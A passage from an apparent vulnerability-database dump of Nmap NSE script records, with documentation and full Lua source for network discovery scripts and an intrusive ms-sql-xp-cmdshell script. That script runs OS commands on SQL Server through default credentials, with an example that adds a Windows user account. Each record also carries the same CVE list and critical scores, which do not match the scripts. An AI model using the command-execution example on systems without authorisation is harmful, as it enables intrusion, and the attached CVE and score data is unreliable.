end\n end\n ls.end_vol(output)\n end\n end\n end\n\n status, response = afpHelper:Logout()\n status, response = afpHelper:CloseSession()\n\n -- stop after first successful attempt\n if #output[\"volumes\"] > 0 then\n ls.report_info(output, (\"information retrieved as %s\"):format(username))\n return ls.end_listing(output)\n end\n end\n return\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:56", "description": "Attempts to use the Service Location Protocol to discover Novell NetWare Core Protocol (NCP) servers.\n\n## Example Usage \n \n \n nmap -sV --script=broadcast-novell-locate <target>\n\n## Script Output \n \n \n Pre-scan script results:\n | broadcast-novell-locate:\n | Tree name: CQURE-LABTREE\n | Server name: linux-l84t\n | Addresses\n |_ 192.168.56.33\n \n \n\n## Requires \n\n * [ipOps](<../lib/ipOps.html>)\n * [srvloc](<../lib/srvloc.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [stringaux](<../lib/stringaux.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-06-15T06:23:30", "type": "nmap", "title": "broadcast-novell-locate NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-18T01:08:19", "id": "NMAP:BROADCAST-NOVELL-LOCATE.NSE", "href": "https://nmap.org/nsedoc/scripts/broadcast-novell-locate.html", "sourceData": "local ipOps = require \"ipOps\"\nlocal srvloc = require \"srvloc\"\nlocal stdnse = require \"stdnse\"\nlocal stringaux = require \"stringaux\"\nlocal table = require \"table\"\n\ndescription = [[\nAttempts to use the Service Location Protocol to discover Novell NetWare Core Protocol (NCP) servers.\n]]\n\n---\n--\n--@output\n-- Pre-scan script results:\n-- | broadcast-novell-locate:\n-- | Tree name: CQURE-LABTREE\n-- | Server name: linux-l84t\n-- | Addresses\n-- |_ 192.168.56.33\n--\n--\n\n-- Version 0.1\n-- Created 04/26/2011 - v0.1 - created by Patrik Karlsson\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"broadcast\", \"safe\"}\n\n\nprerule = function() return true end\n\nfunction action()\n\n local helper = srvloc.Helper:new()\n\n local status, bindery = helper:ServiceRequest(\"bindery.novell\", \"DEFAULT\")\n if ( not(status) or not(bindery) ) then\n helper:close()\n return\n end\n bindery = bindery[1]\n local srvname = bindery:match(\"%/%/%/(.*)$\")\n\n local status, attrib = helper:AttributeRequest(bindery, \"DEFAULT\", \"svcaddr-ws\")\n helper:close()\n attrib = attrib:match(\"^%(svcaddr%-ws=(.*)%)$\")\n if ( not(attrib) ) then return end\n\n local attribs = stringaux.strsplit(\",\", attrib)\n if ( not(attribs) ) then return end\n\n local addrs = { name = \"Addresses\"}\n local ips = {}\n for _, attr in ipairs(attribs) do\n local addr = attr:match(\"^%d*%-%d*%-%d*%-(........)\")\n if ( addr ) then\n local ip = ipOps.str_to_ip(stdnse.fromhex(addr))\n\n if ( not(ips[ip]) ) then\n table.insert(addrs, ip)\n ips[ip] = ip\n end\n end\n end\n\n local output = {}\n local status, treename = helper:ServiceRequest(\"ndap.novell\", \"DEFAULT\")\n if ( status ) then\n treename = treename[1]\n treename = treename:match(\"%/%/%/(.*)%.$\")\n table.insert(output, (\"Tree name: %s\"):format(treename))\n end\n table.insert(output, (\"Server name: %s\"):format(srvname))\n table.insert(output, addrs)\n\n return stdnse.format_output(true, output)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:36:19", "description": "Fingerprints the target RPC port to extract the target service, RPC number and version. \n\nThe script works by sending RPC Null call requests with a random high version unsupported number to the target service with iterated over RPC program numbers from the nmap-rpc file and check for replies from the target port. A reply with a RPC accept state 2 (Remote can't support version) means that we the request sent the matching program number, and we proceed to extract the supported versions. A reply with an accept state RPC accept state 1 (remote hasn't exported program) means that we have sent the incorrect program number. Any other accept state is an incorrect behaviour.\n\n### See also:\n\n * [ rpcinfo.nse ](<../scripts/rpcinfo.html>)\n\n## Script Arguments \n\n#### rpc-grind.threads \n\nNumber of grinding threads. Defaults to `4`\n\n#### mount.version, nfs.version, rpc.protocol \n\nSee the documentation for the [rpc](<../lib/rpc.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -sV <target>\n nmap --script rpc-grind <target>\n nmap --script rpc-grind --script-args 'rpc-grind.threads=8' -p <targetport>\n <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE VERSION\n 53344/udp open walld 1 (RPC #100008)\n \n\n## Requires \n\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [nmap](<../lib/nmap.html>)\n * [rpc](<../lib/rpc.html>)\n * [math](<>)\n * [io](<>)\n * [coroutine](<>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-08-17T18:44:35", "type": "nmap", "title": "rpc-grind NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-09-06T14:20:31", "id": "NMAP:RPC-GRIND.NSE", "href": "https://nmap.org/nsedoc/scripts/rpc-grind.html", "sourceData": "local stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal nmap = require \"nmap\"\nlocal rpc = require \"rpc\"\nlocal math = require \"math\"\nlocal io = require \"io\"\nlocal coroutine = require \"coroutine\"\nlocal table = require \"table\"\n\ndescription = [[\nFingerprints the target RPC port to extract the target service, RPC number and version.\n\nThe script works by sending RPC Null call requests with a random high version\nunsupported number to the target service with iterated over RPC program numbers\nfrom the nmap-rpc file and check for replies from the target port.\nA reply with a RPC accept state 2 (Remote can't support version) means that we\nthe request sent the matching program number, and we proceed to extract the\nsupported versions. A reply with an accept state RPC accept state 1 (remote\nhasn't exported program) means that we have sent the incorrect program number.\nAny other accept state is an incorrect behaviour.\n]]\n\n---\n-- @args rpc-grind.threads Number of grinding threads. Defaults to <code>4</code>\n--\n-- @usage\n-- nmap -sV <target>\n-- nmap --script rpc-grind <target>\n-- nmap --script rpc-grind --script-args 'rpc-grind.threads=8' -p <targetport>\n-- <target>\n--\n--@output\n--PORT STATE SERVICE VERSION\n--53344/udp open walld 1 (RPC #100008)\n--\n-- @see rpcinfo.nse\n\n\nauthor = \"Hani Benhabiles\"\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"version\"}\n\n-- Depend on rpcinfo so we don't grind something that's already known.\ndependencies = {\"rpcinfo\"}\n\nportrule = function(host, port)\n -- Do not run for excluded ports\n if (nmap.port_is_excluded(port.number, port.protocol)) then\n return false\n end\n if port.service ~= nil and port.version.service_dtype ~= \"table\" and port.service ~= 'rpcbind' then\n -- Exclude services that have already been detected as something\n -- different than rpcbind.\n return false\n end\n return nmap.version_intensity() >= 7\nend\n\n--- Function that determines if the target port of host uses RPC protocol.\n--@param host Host table as commonly used in Nmap.\n--@param port Port table as commonly used in Nmap.\n--@return status boolean True if target port uses RPC protocol, false else.\nlocal isRPC = function(host, port)\n -- If rpcbind is already set up by -sV\n -- which does practically the same check as in the \"else\" part.\n -- The nmap-services-probe entry \"rpcbind\" is not correctly true, and should\n -- be changed to something like \"sunrpc\"\n if port.service == 'rpcbind' then\n return true\n else\n -- this check is important if we didn't run the scan with -sV.\n -- If we run the scan with -sV, this check shouldn't return true as it is pretty much similar\n -- to the \"rpcbind\" service probe in nmap-service-probes.\n local rpcConn, status, err, data, rxid, msgtype, _\n\n -- Create new socket\n -- rpcbind is not really important, we could have used another protocol from rpc.lua\n -- such as nfs or mountd. Same thing for version 2.\n rpcConn = rpc.Comm:new(\"rpcbind\", 2)\n status, err = rpcConn:Connect(host, port)\n if not status then\n stdnse.debug1(\"%s\", err)\n return\n end\n\n -- Send packet\n local xid = math.random(1234567890)\n data = rpcConn:EncodePacket(xid)\n status, err = rpcConn:SendPacket(data)\n if not status then\n stdnse.debug1(\"SendPacket(): %s\", err)\n return\n end\n\n -- And check response\n status, data = rpcConn:ReceivePacket()\n if not status then\n stdnse.debug1(\"isRPC didn't receive response.\")\n return\n else\n -- If we got response, set port to open\n nmap.set_port_state(host, port, \"open\")\n\n rxid, msgtype = string.unpack(\">I4 I4\", data)\n -- If response XID does match request XID\n -- and message type equals 1 (REPLY) then\n -- it is a RPC port.\n if rxid == xid and msgtype == 1 then\n return true\n end\n end\n end\n stdnse.debug1(\"RPC checking function response data is not RPC.\")\nend\n\n-- Function that iterates over the nmap-rpc file and\n-- returns program name and number pairs.\n-- @return name Name of the RPC service.\n-- @return number RPC number of the matching service name.\nlocal rpcIterator = function()\n -- Check if nmap-rpc file is present.\n local path = nmap.fetchfile(\"nmap-rpc\")\n if not path then\n stdnse.debug1(\"Could not find nmap-rpc file.\")\n return false\n end\n\n -- And is readable\n local nmaprpc, _, _ = io.open( path, \"r\" )\n if not nmaprpc then\n stdnse.debug1(\"Could not open nmap-rpc for reading.\")\n return false\n end\n\n return function()\n while true do\n local line = nmaprpc:read()\n if not line then\n break\n end\n -- Now, we parse lines for meaningful ones\n local name, number = line:match(\"^%s*([^%s#]+)%s+(%d+)\")\n -- And return program name and number\n if name and number then\n return name, tonumber(number)\n end\n end\n end\nend\n\n--- Function that sends RPC null commands with a random version number and\n-- iterated over program numbers and checks the response for a sign that the\n-- sent program number is the matching one for the target service.\n-- @param host Host table as commonly used in Nmap.\n-- @param port Port table as commonly used in Nmap.\n-- @param iterator Iterator function that returns program name and number pairs.\n-- @param result table to put result into.\nlocal rpcGrinder = function(host, port, iterator, result)\n local condvar = nmap.condvar(result)\n local rpcConn, version, xid, status, response, packet, err, data, _\n\n xid = math.random(123456789)\n -- We use a random, most likely unsupported version so that\n -- we also trigger min and max version disclosure for the target service.\n version = math.random(12345, 123456789)\n rpcConn = rpc.Comm:new(\"rpcbind\", version)\n rpcConn:SetCheckProgVer(false)\n status, err = rpcConn:Connect(host, port)\n\n if not status then\n stdnse.debug1(\"Connect(): %s\", err)\n condvar \"signal\";\n return\n end\n for program, number in iterator do\n -- No need to continue further if we found the matching service.\n if #result > 0 then\n break\n end\n\n xid = xid + 1 -- XiD increased by 1 each time (from old RPC grind) <= Any important reason for that?\n rpcConn:SetProgID(number)\n packet = rpcConn:EncodePacket(xid)\n status, err = rpcConn:SendPacket(packet)\n if not status then\n stdnse.debug1(\"SendPacket(): %s\", err)\n condvar \"signal\";\n return\n end\n\n status, data = rpcConn:ReceivePacket()\n if not status then\n stdnse.debug1(\"ReceivePacket(): %s\", data)\n condvar \"signal\";\n return\n end\n\n _,response = rpcConn:DecodeHeader(data, 1)\n if type(response) == 'table' then\n if xid ~= response.xid then\n -- Shouldn't happen.\n stdnse.debug1(\"XID mismatch.\")\n end\n -- Look at accept state\n -- Not supported version means that we used the right program number\n if response.accept_state == rpc.Portmap.AcceptState.PROG_MISMATCH then\n result.program = program\n result.number = number\n result.lowver, result.highver = string.unpack(\">I4 I4\", data, #data - 7)\n table.insert(result, true) -- To make #result > 1\n\n -- Otherwise, an Accept state other than Program unavailable is not normal behaviour.\n elseif response.accept_state ~= rpc.Portmap.AcceptState.PROG_UNAVAIL then\n stdnse.debug1(\"returned %s accept state for %s program number.\", response.accept_state, number)\n end\n end\n end\n condvar \"signal\";\n return result\nend\n\naction = function(host, port)\n local result, lthreads = {}, {}\n\n if not isRPC(host, port) then\n stdnse.debug1(\"Target port %s is not a RPC port.\", port.number)\n return\n end\n local threads = tonumber(stdnse.get_script_args(SCRIPT_NAME .. \".threads\")) or 4\n\n local iterator = rpcIterator()\n if not iterator then\n return\n end\n -- And now, exec our grinder\n for i = 1,threads do\n local co = stdnse.new_thread(rpcGrinder, host, port, iterator, result)\n lthreads[co] = true\n end\n\n local condvar = nmap.condvar(result)\n repeat\n for thread in pairs(lthreads) do\n if coroutine.status(thread) == \"dead\" then\n lthreads[thread] = nil\n end\n end\n if ( next(lthreads) ) then\n condvar \"wait\";\n end\n until next(lthreads) == nil;\n\n -- Check the result and set the port version.\n if #result > 0 then\n port.version.name = result.program\n port.version.extrainfo = \"RPC #\" .. result.number\n if result.highver ~= result.lowver then\n port.version.version = (\"%s-%s\"):format(result.lowver, result.highver)\n else\n port.version.version = result.highver\n end\n nmap.set_port_version(host, port, \"hardmatched\")\n else\n stdnse.debug1(\"Couldn't determine the target RPC service. Running a service not in nmap-rpc ?\")\n end\n return nil\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:31:06", "description": "Attempts to run a command using the command shell of Microsoft SQL Server (ms-sql). \n\nSQL Server credentials required: Yes (use `ms-sql-brute`, `ms-sql-empty-password` and/or `mssql.username` & `mssql.password`) Run criteria: \n\n * Host script: Will run if the `mssql.instance-all`, `mssql.instance-name`\nor `mssql.instance-port` script arguments are used (see mssql.lua). \n\n * Port script: Will run against any services identified as SQL Servers, but only \nif the `mssql.instance-all`, `mssql.instance-name` and `mssql.instance-port` script arguments are NOT used. \n\nThe script needs an account with the sysadmin server role to work. \n\nWhen run, the script iterates over the credentials and attempts to run the command until either all credentials are exhausted or until the command is executed. \n\nNOTE: Communication with instances via named pipes depends on the `smb` library. To communicate with (and possibly to discover) instances via named pipes, the host must have at least one SMB port (e.g. TCP 445) that was scanned and found to be open. Additionally, named pipe connections may require Windows authentication to connect to the Windows host (via SMB) in addition to the authentication required to connect to the SQL Server instances itself. See the documentation and arguments for the `smb` library for more information. \n\nNOTE: By default, the ms-sql-* scripts may attempt to connect to and communicate with ports that were not included in the port list for the Nmap scan. This can be disabled using the `mssql.scanned-ports-only` script argument.\n\n## Script Arguments \n\n#### ms-sql-xp-cmdshell.cmd \n\nThe OS command to run (default: ipconfig /all).\n\n#### mssql.domain, mssql.instance-all, mssql.instance-name, mssql.instance-port, mssql.password, mssql.protocol, mssql.scanned-ports-only, mssql.timeout, mssql.username \n\nSee the documentation for the [mssql](<../lib/mssql.html#script-args>) library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the [smb](<../lib/smb.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -p 445 --script ms-sql-discover,ms-sql-empty-password,ms-sql-xp-cmdshell <host>\n nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd=\"net user test test /add\" <host>\n \n\n## Script Output \n \n \n | ms-sql-xp-cmdshell:\n | [192.168.56.3\\MSSQLSERVER]\n | Command: ipconfig /all\n | output\n | ======\n |\n | Windows IP Configuration\n |\n | Host Name . . . . . . . . . . . . : EDUSRV011\n | Primary Dns Suffix . . . . . . . : cqure.net\n | Node Type . . . . . . . . . . . . : Unknown\n | IP Routing Enabled. . . . . . . . : No\n | WINS Proxy Enabled. . . . . . . . : No\n | DNS Suffix Search List. . . . . . : cqure.net\n |\n | Ethernet adapter Local Area Connection 3:\n |\n | Connection-specific DNS Suffix . :\n | Description . . . . . . . . . . . : AMD PCNET Family PCI Ethernet Adapter #2\n | Physical Address. . . . . . . . . : 08-00-DE-AD-C0-DE\n | DHCP Enabled. . . . . . . . . . . : Yes\n | Autoconfiguration Enabled . . . . : Yes\n | IP Address. . . . . . . . . . . . : 192.168.56.3\n | Subnet Mask . . . . . . . . . . . : 255.255.255.0\n | Default Gateway . . . . . . . . . :\n | DHCP Server . . . . . . . . . . . : 192.168.56.2\n | Lease Obtained. . . . . . . . . . : den 21 mars 2010 00:12:10\n | Lease Expires . . . . . . . . . . : den 21 mars 2010 01:12:10\n |_\n\n## Requires \n\n * [mssql](<../lib/mssql.html>)\n * [nmap](<../lib/nmap.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-04-04T10:11:54", "type": "nmap", "title": "ms-sql-xp-cmdshell NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2022-01-03T21:08:52", "id": "NMAP:MS-SQL-XP-CMDSHELL.NSE", "href": "https://nmap.org/nsedoc/scripts/ms-sql-xp-cmdshell.html", "sourceData": "local mssql = require \"mssql\"\nlocal nmap = require \"nmap\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\n-- -*- mode: lua -*-\n-- vim: set filetype=lua :\n\ndescription = [[\nAttempts to run a command using the command shell of Microsoft SQL\nServer (ms-sql).\n\nSQL Server credentials required: Yes (use <code>ms-sql-brute</code>, <code>ms-sql-empty-password</code>\nand/or <code>mssql.username</code> & <code>mssql.password</code>)\nRun criteria:\n* Host script: Will run if the <code>mssql.instance-all</code>, <code>mssql.instance-name</code>\nor <code>mssql.instance-port</code> script arguments are used (see mssql.lua).\n* Port script: Will run against any services identified as SQL Servers, but only\nif the <code>mssql.instance-all</code>, <code>mssql.instance-name</code>\nand <code>mssql.instance-port</code> script arguments are NOT used.\n\nThe script needs an account with the sysadmin server role to work.\n\nWhen run, the script iterates over the credentials and attempts to run\nthe command until either all credentials are exhausted or until the\ncommand is executed.\n\nNOTE: Communication with instances via named pipes depends on the <code>smb</code>\nlibrary. To communicate with (and possibly to discover) instances via named pipes,\nthe host must have at least one SMB port (e.g. TCP 445) that was scanned and\nfound to be open. Additionally, named pipe connections may require Windows\nauthentication to connect to the Windows host (via SMB) in addition to the\nauthentication required to connect to the SQL Server instances itself. See the\ndocumentation and arguments for the <code>smb</code> library for more information.\n\nNOTE: By default, the ms-sql-* scripts may attempt to connect to and communicate\nwith ports that were not included in the port list for the Nmap scan. This can\nbe disabled using the <code>mssql.scanned-ports-only</code> script argument.\n]]\n\n---\n-- @usage\n-- nmap -p 445 --script ms-sql-discover,ms-sql-empty-password,ms-sql-xp-cmdshell <host>\n-- nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd=\"net user test test /add\" <host>\n--\n-- @args ms-sql-xp-cmdshell.cmd The OS command to run (default: ipconfig /all).\n--\n-- @output\n-- | ms-sql-xp-cmdshell:\n-- | [192.168.56.3\\MSSQLSERVER]\n-- | Command: ipconfig /all\n-- | output\n-- | ======\n-- |\n-- | Windows IP Configuration\n-- |\n-- | Host Name . . . . . . . . . . . . : EDUSRV011\n-- | Primary Dns Suffix . . . . . . . : cqure.net\n-- | Node Type . . . . . . . . . . . . : Unknown\n-- | IP Routing Enabled. . . . . . . . : No\n-- | WINS Proxy Enabled. . . . . . . . : No\n-- | DNS Suffix Search List. . . . . . : cqure.net\n-- |\n-- | Ethernet adapter Local Area Connection 3:\n-- |\n-- | Connection-specific DNS Suffix . :\n-- | Description . . . . . . . . . . . : AMD PCNET Family PCI Ethernet Adapter #2\n-- | Physical Address. . . . . . . . . : 08-00-DE-AD-C0-DE\n-- | DHCP Enabled. . . . . . . . . . . : Yes\n-- | Autoconfiguration Enabled . . . . : Yes\n-- | IP Address. . . . . . . . . . . . : 192.168.56.3\n-- | Subnet Mask . . . . . . . . . . . : 255.255.255.0\n-- | Default Gateway . . . . . . . . . :\n-- | DHCP Server . . . . . . . . . . . : 192.168.56.2\n-- | Lease Obtained. . . . . . . . . . : den 21 mars 2010 00:12:10\n-- | Lease Expires . . . . . . . . . . : den 21 mars 2010 01:12:10\n-- |_\n\n-- Created 01/17/2010 - v0.1 - created by Patrik Karlsson <patrik@cqure.net>\n-- Revised 02/01/2011 - v0.2 - Added ability to run against all instances on a host;\n-- added compatibility with changes in mssql.lua (Chris Woodbury)\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"intrusive\"}\n\n\ndependencies = {\"broadcast-ms-sql-discover\", \"ms-sql-brute\", \"ms-sql-empty-password\"}\n\n\nlocal function process_instance( instance )\n\n local status, result\n local query\n local cmd = stdnse.get_script_args( {'ms-sql-xp-cmdshell.cmd', 'mssql-xp-cmdshell.cmd'} ) or 'ipconfig /all'\n local output = {}\n\n query = (\"EXEC master..xp_cmdshell '%s'\"):format(cmd)\n\n local creds = mssql.Helper.GetLoginCredentials_All( instance )\n if ( not creds ) then\n output = \"ERROR: No login credentials.\"\n else\n for username, password in pairs( creds ) do\n local helper = mssql.Helper:new()\n status, result = helper:ConnectEx( instance )\n if ( not(status) ) then\n output = \"ERROR: \" .. result\n break\n end\n\n if ( status ) then\n status = helper:Login( username, password, nil, instance.host.ip )\n end\n\n if ( status ) then\n status, result = helper:Query( query )\n end\n helper:Disconnect()\n\n if ( status ) then\n output = mssql.Util.FormatOutputTable( result, true )\n output[ \"name\" ] = string.format( \"Command: %s\", cmd )\n break\n elseif ( result and result:gmatch(\"xp_configure\") ) then\n if( nmap.verbosity() > 1 ) then\n output = \"Procedure xp_cmdshell disabled. For more information see \\\"Surface Area Configuration\\\" in Books Online.\"\n end\n end\n end\n end\n\n local instanceOutput = {}\n instanceOutput[\"name\"] = string.format( \"[%s]\", instance:GetName() )\n table.insert( instanceOutput, output )\n\n return instanceOutput\n\nend\n\n\nlocal do_action\ndo_action, portrule, hostrule = mssql.Helper.InitScript(process_instance)\n\naction = function(...)\n local scriptOutput = do_action(...)\n if ( not(stdnse.get_script_args( {'ms-sql-xp-cmdshell.cmd', 'mssql-xp-cmdshell.cmd'} ) ) ) then\n table.insert(scriptOutput, 1, \"(Use --script-args=ms-sql-xp-cmdshell.cmd='<CMD>' to change command.)\")\n end\n\n return stdnse.format_output( true, scriptOutput )\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:32:28", "description": "Detect the T3 RMI protocol and Weblogic version\n\n## Example Usage \n \n \n nmap -sV <target>\n\n## Requires \n\n * [comm](<../lib/comm.html>)\n * [string](<>)\n * [shortport](<../lib/shortport.html>)\n * [nmap](<../lib/nmap.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2013-10-30T15:10:00", "type": "nmap", "title": "weblogic-t3-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2016-06-09T22:46:42", "id": "NMAP:WEBLOGIC-T3-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/weblogic-t3-info.html", "sourceData": "local comm = require \"comm\"\nlocal string = require \"string\"\nlocal shortport = require \"shortport\"\nlocal nmap = require \"nmap\"\n\ndescription = \"Detect the T3 RMI protocol and Weblogic version\"\nauthor = {\"Alessandro ZANNI <alessandro.zanni@bt.com>\", \"Daniel Miller\"}\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"default\",\"safe\",\"discovery\",\"version\"}\n\nportrule = function(host, port)\n if type(port.version) == \"table\" and port.version.name_confidence > 3 and port.version.product ~= nil then\n return string.find(port.version.product, \"WebLogic\", 1, true) and nmap.version_intensity() >= 7\n end\n return shortport.version_port_or_service({7001,7002,7003},\"http\")(host,port)\nend\n\naction = function(host, port)\n local status, result = comm.exchange(host, port,\n \"t3 12.1.2\\nAS:2048\\nHL:19\\n\\n\")\n\n if (not status) then\n return nil\n end\n\n local weblogic_version = string.match(result, \"^HELO:(%d+%.%d+%.%d+%.%d+)%.\")\n\n local rval = nil\n port.version = port.version or {}\n local extrainfo = port.version.extrainfo\n if extrainfo == nil then\n extrainfo = \"\"\n else\n extrainfo = extrainfo .. \"; \"\n end\n if weblogic_version then\n if weblogic_version == \"12.1.2\" then\n status, result = comm.exchange(host, port,\n \"t3 11.1.2\\nAS:2048\\nHL:19\\n\\n\")\n weblogic_version = string.match(result, \"^HELO:(%d+%.%d+%.%d+%.%d+)%.\")\n if weblogic_version == \"11.1.2\" then\n -- Server just echoes whatever version we send.\n rval = \"T3 protocol in use (Unknown WebLogic version)\"\n else\n port.version.version = weblogic_version\n rval = \"T3 protocol in use (WebLogic version: \" .. weblogic_version .. \")\"\n end\n else\n port.version.version = weblogic_version\n rval = \"T3 protocol in use (WebLogic version: \" .. weblogic_version .. \")\"\n end\n port.version.extrainfo = extrainfo .. \"T3 enabled\"\n elseif string.match(result, \"^LGIN:\") then\n port.version.extrainfo = extrainfo .. \"T3 enabled\"\n rval = \"T3 protocol in use (handshake failed)\"\n elseif string.match(result, \"^SERV:\") then\n port.version.extrainfo = extrainfo .. \"T3 enabled\"\n rval = \"T3 protocol in use (No such service)\"\n elseif string.match(result, \"^UNAV:\") then\n port.version.extrainfo = extrainfo .. \"T3 enabled\"\n rval = \"T3 protocol in use (Service unavailable)\"\n elseif string.match(result, \"^LICN:\") then\n port.version.extrainfo = extrainfo .. \"T3 enabled\"\n rval = \"T3 protocol in use (No license)\"\n elseif string.match(result, \"^RESC:\") then\n port.version.extrainfo = extrainfo .. \"T3 enabled\"\n rval = \"T3 protocol in use (No resource)\"\n elseif string.match(result, \"^VERS:\") then\n weblogic_version = string.match(result, \"^VERS:Incompatible versions %- this server:(%d+%.%d+%.%d+%.%d+)\")\n if weblogic_version then\n port.version.version = weblogic_version\n end\n port.version.extrainfo = extrainfo .. \"T3 enabled\"\n rval = \"T3 protocol in use (Incompatible version)\"\n elseif string.match(result, \"^CATA:\") then\n port.version.extrainfo = extrainfo .. \"T3 enabled\"\n rval = \"T3 protocol in use (Catastrophic failure)\"\n elseif string.match(result, \"^CMND:\") then\n port.version.extrainfo = extrainfo .. \"T3 enabled\"\n rval = \"T3 protocol in use (No such command)\"\n end\n\n if rval then\n if port.version.product == nil then\n port.version.product = \"WebLogic application server\"\n end\n nmap.set_port_version(host, port, \"hardmatched\")\n end\n\n return rval\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:44:48", "description": "Grabs affiliate network IDs (e.g. Google AdSense or Analytics, Amazon Associates, etc.) from a web page. These can be 